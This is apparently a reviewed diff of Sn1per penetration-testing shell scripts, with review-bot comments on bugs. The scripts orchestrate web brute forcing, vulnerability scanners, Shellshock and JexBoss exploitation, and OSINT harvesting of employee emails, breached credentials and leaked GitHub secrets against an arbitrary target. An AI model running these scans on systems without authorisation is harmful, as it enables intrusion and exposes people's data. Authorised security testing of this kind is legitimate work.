echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
echo ""
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url https://$TARGET --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
echo ""
else
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
echo ""
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
echo ""
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port443a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port443b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port443.txt
fi
if [[ "$SHOCKER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
fi
if [[ "$JEXBOSS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port443.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target https://$TARGET -o $LOOT_DIR/web/nuclei-https-10.0.0.19-port443.txt
fi
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
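Review bot: the wpscan block in this hunk tees its output straight into `wpscan-$TARGET-https-port443a.txt` / `...port443b.txt`, but the two `sed` lines that follow read `...port443a.raw` / `...port443b.raw`, which are never created, and redirect into those same `.txt` files, so the captured results are replaced by empty files; mirror the HTTP variant (tee to `.raw`, strip the colour codes into `.txt`). Also in this hunk: `"SLACK_NOTIFICATIONS" == "1"` in the spider-new check is missing the `$`, so the literal string never matches and that Slack post never fires; after `sed -ir` on `spider-$TARGET.txt`, the `mv -f .../spider-$TARGET.txtr .../spider-$TARGET.txt` moves sed's backup (the unedited original) back over the edited file, undoing the substitution (use `sed -i` and drop the `mv`); `curl -s GET "https://api.hackertarget.com/..."` passes `GET` as a second URL rather than a method (curl reports it cannot resolve host `GET`; use `-X GET` or drop it); and the nuclei output path hard-codes `nuclei-https-10.0.0.19-port443.txt` instead of `$TARGET`.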

57
modes/nuke.sh Normal file

@@ -0,0 +1,57 @@
# NUKE MODE #####################################################################################################
if [[ "$MODE" = "nuke" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET -b"
echo -e "$OKRED "
echo -e "$OKRED ____"
echo -e "$OKRED __,-~~/~ \`---."
echo -e "$OKRED _/_,---( , )"
echo -e "$OKRED __ / < / ) \___"
echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
echo -e "$OKRED (_ ( \ ( > \)"
echo -e "$OKRED \_( _ < >_>'"
echo -e "$OKRED ~ \`-i' ::>|--\""
echo -e "$OKRED I;|.|.|"
echo -e "$OKRED <|i::|i|\`."
echo -e "$OKRED (\` ^''\`-' ')"
echo -e "$OKRED --------------------------------------------------------- $RESET"
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
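Review bot: `for a in \`cat $FILE\`` in this hunk iterates over whitespace-split, glob-expanded words, so a targets file with CRLF line endings or a `*` entry yields mangled `TARGET` values, and a missing or unreadable `$FILE` silently produces zero iterations since only `-z "$FILE"` is checked; read it with `while IFS= read -r a; do ...; done < "$FILE"` and test `-r "$FILE"` first. Smaller points: the `2>&1` on `sniper $args | tee ... 2>&1` applies to `tee`, not to `sniper`, so sniper's stderr never reaches the output file; and the bare `exit` after the "specify a list of targets" message returns 0, so a caller cannot tell the run was refused (`exit 1`).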

133
modes/osint.sh Normal file

@@ -0,0 +1,133 @@
if [[ "$OSINT" = "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$WHOIS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
fi
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt"
fi
fi
if [[ "$SPOOF_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
dig $TARGET txt | egrep -i 'spf|DMARC|dkim' | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
dig iport._domainkey.${TARGET} txt | egrep -i 'spf|DMARC|DKIM' | tee -a $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
dig _dmarc.${TARGET} txt | egrep -i 'spf|DMARC|DKIM' | tee -a $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
echo ""
if [[ "$SLACK_NOTIFICATIONS_EMAIL_SECURITY" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/email-$TARGET.txt"
fi
fi
if [[ "$ULTRATOOLS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING ULTATOOLS DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s https://www.ultratools.com/tools/ipWhoisLookupResult\?ipAddress\=$TARGET | grep -A2 label | grep -v input | grep span | cut -d">" -f2 | cut -d"<" -f1 | sed 's/\&nbsp\;//g' 2> /dev/null | tee $LOOT_DIR/osint/ultratools-$TARGET.txt 2> /dev/null
fi
if [[ "$INTODNS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
wget -q http://www.intodns.com/$TARGET -O $LOOT_DIR/osint/intodns-$TARGET.html 2> /dev/null
echo -e "$OKRED[+]$RESET Report saved to: $LOOT_DIR/osint/intodns-$TARGET.html"
fi
if [[ "$THEHARVESTER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING THEHARVESTER OSINT INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cp -f /etc/theHarvester/api-keys.yaml ~/api-keys.yaml 2> /dev/null
cd ~ 2> /dev/null
theHarvester -d $TARGET -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_THEHARVESTER" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/theharvester-$TARGET.txt"
fi
fi
if [[ "$EMAILFORMAT" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS FROM EMAIL-FORMAT.COM $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s https://www.email-format.com/d/$TARGET| grep @$TARGET | grep -v div | sed "s/\t//g" | sed "s/ //g" 2> /dev/null | tee $LOOT_DIR/osint/email-format-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_EMAIL_FORMAT" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/email-format-$TARGET.txt"
fi
fi
if [[ "$URLCRAZY" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING DNS ALTERATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
urlcrazy $TARGET 2> /dev/null | tee $LOOT_DIR/osint/urlcrazy-$TARGET.txt 2> /dev/null
fi
if [[ "$METAGOOFIL" == "1" ]]; then
if [[ "$VERBOSE" == "1" ]]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET"
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $INSTALL_DIR/plugins/metagoofil/
python3 metagoofil.py -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR
if [[ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/metagoofil-$TARGET.txt"
fi
fi
if [[ "$URLSCANIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED COLLECTING OSINT FROM URLSCAN.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl --insecure -L -s "https://urlscan.io/api/v1/search/?q=domain:$TARGET" 2> /dev/null | egrep "country|server|domain|ip|asn|$TARGET|prt"| sort -u | tee $LOOT_DIR/osint/urlscanio-$TARGET.txt 2> /dev/null
fi
if [[ "$HUNTERIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA HUNTER.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s "https://api.hunter.io/v2/domain-search?domain=$TARGET&api_key=$HUNTERIO_KEY" | egrep "name|value|domain|company|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/hunterio-$TARGET.txt 2> /dev/null
fi
if [[ "$TOMBAIO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA TOMBA.IO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -H "X-Tomba-Key: $TOMBAIO_KEY" -H "X-Tomba-Secret: $TOMBAIO_SECRET" -s "https://api.tomba.io/v1/domain-search?domain=$TARGET" | egrep "email|organization|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/tombaio$TARGET.txt 2> /dev/null
fi
if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING EMAILS VIA METASPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -x "use auxiliary/gather/search_email_collector; set DOMAIN $TARGET; run; exit y" | tee $LOOT_DIR/osint/msf-emails-$TARGET.txt 2> /dev/null
fi
if [[ "$H8MAIL" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR COMPROMISED CREDENTIALS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
h8mail -q domain --target $TARGET -o $LOOT_DIR/osint/h8mail-$TARGET.csv 2> /dev/null
fi
if [[ "$GITHUB_SECRETS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR GITHUB SECRETS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $INSTALL_DIR/plugins/gitGraber/
ORGANIZATION=$(echo $TARGET | awk -F. '{print $(NF-1)}' 2> /dev/null)
mv $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.old 2> /dev/null
mv -f rawGitUrls.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt 2> /dev/null
touch rawGitUrls.txt 2> /dev/null
python3 gitGraber.py -q "\"org:$ORGANIZATION\"" -s 2>&1 | tee $LOOT_DIR/osint/gitGrabber-$ORGANIZATION.txt 2> /dev/null
diff $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.old 2> /dev/null > $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff
cat $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff 2> /dev/null
#python3 gitGraber.py -k wordlists/keywords.txt -q "\"$TARGET\"" -s 2>&1 | tee $LOOT_DIR/osint/gitGrabber-$TARGET.txt 2> /dev/null
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
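Review bot: `curl --insecure -L` on the urlscan.io request disables certificate verification for a plain HTTPS API call, so the OSINT data it collects can be altered by anyone on path; the hunter.io and tomba.io requests a few lines later do not pass `--insecure` and urlscan.io needs it no more than they do, so drop the flag. Two smaller points in the same region: the tomba.io output path `$LOOT_DIR/osint/tombaio$TARGET.txt` lacks the hyphen every other loot file uses (`hunterio-$TARGET.txt`, `msf-emails-$TARGET.txt`), and `ORGANIZATION=$(echo $TARGET | awk -F. '{print $(NF-1)}')` takes the second-to-last label, which for a target under a two-level public suffix such as `example.co.uk` yields `co`, so the `org:` GitHub query searches the wrong organisation.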

26
modes/osint_stage_2.sh Normal file

@@ -0,0 +1,26 @@
if [[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ $GOOHAK = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
goohak $TARGET > /dev/null
fi
if [[ $INURLBR = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
